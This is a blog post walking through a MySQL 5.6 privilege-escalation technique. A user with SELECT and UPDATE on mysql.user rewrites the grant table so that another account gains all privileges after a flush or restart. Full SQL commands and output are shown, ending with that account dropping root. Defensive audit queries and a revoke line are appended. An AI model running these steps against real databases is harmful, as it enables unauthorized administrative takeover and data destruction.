How to quietly escalate MySQL user privileges

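Note:

A successful unauthorized privilege escalation requires:
1. SELECT and UPDATE privileges on the MySQL grant tables;
2. An incidental restart of the database server.

Version tested: 5.6.25

Preparing the malicious user: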

  grant update on mysql.user to heike@'localhost' identified by 'heike';

  Log in to the database as heike@localhost:

  mysql> select * from user;
  ERROR 1142 (42000): SELECT command denied to user 'heike'@'localhost' for table 'user'

  mysql> update mysql.user set user='test003' where user='test03';
  ERROR 1143 (42000): SELECT command denied to user 'heike'@'localhost' for column 'user' in table 'user'

  OK, that failed. Now also grant heike@localhost the SELECT privilege on the user table:

  mysql> grant select on mysql.user to heike@'localhost' identified by 'heike';
  Query OK, 0 rows affected (0.00 sec)

  Now heike@localhost can access the mysql.user table normally.

 

Preparing the test user:

mysql>  show grants for test02@'localhost';
+---------------------------------------------------------------------------------------------------------------+
| Grants for test02@localhost                                                                                   |
+---------------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD '*1556A6F65259CE3FBEA8489096F7797B4E0D5BEC' |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                                                        |
+---------------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

test02@'localhost' only has the privilege to query the db_test.t1 table.

Now use heike@localhost to escalate the privileges of test02@'localhost'.

Let's give test02@'localhost' a huge set of privileges. Execute as heike@localhost:

update mysql.user set  Select_priv='Y',
           Insert_priv='Y',
           Update_priv='Y',
           Delete_priv='Y',
           Create_priv='Y',
             Drop_priv='Y',
           Reload_priv='Y',
         Shutdown_priv='Y',
          Process_priv='Y',
             File_priv='Y',
            Grant_priv='Y',
       References_priv='Y',
            Index_priv='Y',
            Alter_priv='Y',
          Show_db_priv='Y',
            Super_priv='Y',
 Create_tmp_table_priv='Y',
      Lock_tables_priv='Y',
          Execute_priv='Y',
       Repl_slave_priv='Y',
      Repl_client_priv='Y',
      Create_view_priv='Y',
        Show_view_priv='Y',
   Create_routine_priv='Y',
    Alter_routine_priv='Y',
      Create_user_priv='Y',
            Event_priv='Y',
          Trigger_priv='Y',
Create_tablespace_priv='Y'
where user='test02' and host='localhost';

Query OK, 1 row affected (0.04 sec)
Rows matched: 1  Changed: 1  Warnings: 0

 

But check the privileges of test02@localhost again:

+----------------------------------------------------------------------------+
| Grants for test02@localhost                                                |
+----------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret> |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                     |
+----------------------------------------------------------------------------+
2 rows in set (0.00 sec)

OK, the privileges have not changed. But don't lose heart.

Let us wait quietly until, one day, a user with the privilege to run flush privileges executes:

mysql>flush privileges;

Now look at the privileges of test02@localhost again:

mysql> show grants for test02@localhost;
+-------------------------------------------------------------------------------------------------------+
| Grants for test02@localhost                                                                           |
+-------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'test02'@'localhost' IDENTIFIED BY PASSWORD <secret> WITH GRANT OPTION |
| GRANT SELECT ON `db_test`.`t1` TO 'test02'@'localhost'                                                |
+-------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

At this point, do you think test02@localhost has pulled off its comeback and made it to the top?

Since you think so, let it drop `db_test`.`t1`:

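mysql> drop table db_test.t1;
ERROR 1142 (42000): DROP command denied to user 'test02'@'localhost' for table 't1'

What? It cannot drop the table, and the error says the privileges are insufficient. This must be a misunderstanding; let me try again:

mysql> select user,host,password from mysql.user;
ERROR 1142 (42000): SELECT command denied to user 'test02'@'localhost' for table 'user'

What? It cannot even run a query. Where are the promised ALL PRIVILEGES!

Let me try once more: create a new ordinary table t2 and see whether test02@localhost can access it.

mysql> select * from db_test.t2;
ERROR 1142 (42000): SELECT command denied to user 'test02'@'localhost' for table 't2'

OK, so far the privileges of 'test02'@'localhost' have not changed in the slightest.

Then restart the server:

>service mysqld restart

Try again: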

mysql> drop user root@'::1';
Query OK, 0 rows affected (0.08 sec)

mysql> select user();
+------------------+
| user()           |
+------------------+
| test02@localhost |
+------------------+
1 row in set (0.00 sec)

Haha! Look. By now test02@localhost has taken out the root user!
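
Prerequisite 1 above is the part an administrator controls. The audit queries below are an added example, not part of the original post: they list every account that can write to tables in the mysql schema at any grant level. They assume an administrative account with SELECT on the mysql schema and the 5.6 grant-table layout used in this walkthrough.

```sql
-- Added example (not from the original post): who can modify the grant tables?
-- Assumes MySQL 5.6-style grant tables and an admin session.

-- 1. Table-level grants inside the mysql schema. This is the case shown on
--    this page: UPDATE and SELECT on mysql.user given to heike@'localhost'.
SELECT User, Host, Table_name, Table_priv
FROM mysql.tables_priv
WHERE Db = 'mysql'
  AND (FIND_IN_SET('Insert', Table_priv)
    OR FIND_IN_SET('Update', Table_priv)
    OR FIND_IN_SET('Delete', Table_priv));

-- 2. Column-level grants inside the mysql schema.
SELECT User, Host, Table_name, Column_name, Column_priv
FROM mysql.columns_priv
WHERE Db = 'mysql'
  AND (FIND_IN_SET('Insert', Column_priv)
    OR FIND_IN_SET('Update', Column_priv));

-- 3. Database-level grants. mysql.db.Db can hold a wildcard pattern
--    (for example '%' or 'my%'), so match the schema name against it.
SELECT User, Host, Db, Insert_priv, Update_priv, Delete_priv
FROM mysql.db
WHERE 'mysql' LIKE Db
  AND 'Y' IN (Insert_priv, Update_priv, Delete_priv);

-- 4. Global write privileges (ON *.*), which also cover the mysql schema.
--    This reads the on-disk table, so a row changed by a direct UPDATE shows
--    up here even while SHOW GRANTS still reports the old privileges, as in
--    the walkthrough above. Any non-admin account listed is worth a review.
SELECT User, Host, Insert_priv, Update_priv, Delete_priv,
       Grant_priv, Super_priv
FROM mysql.user
WHERE 'Y' IN (Insert_priv, Update_priv, Delete_priv);

-- Remediation for the account created on this page (review before running):
-- REVOKE SELECT, UPDATE ON mysql.user FROM 'heike'@'localhost';
```

Every row returned by queries 1 to 3 for a non-administrative account satisfies the first prerequisite and should be revoked.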

 

posted on 2016-04-11 10:06  风的_理想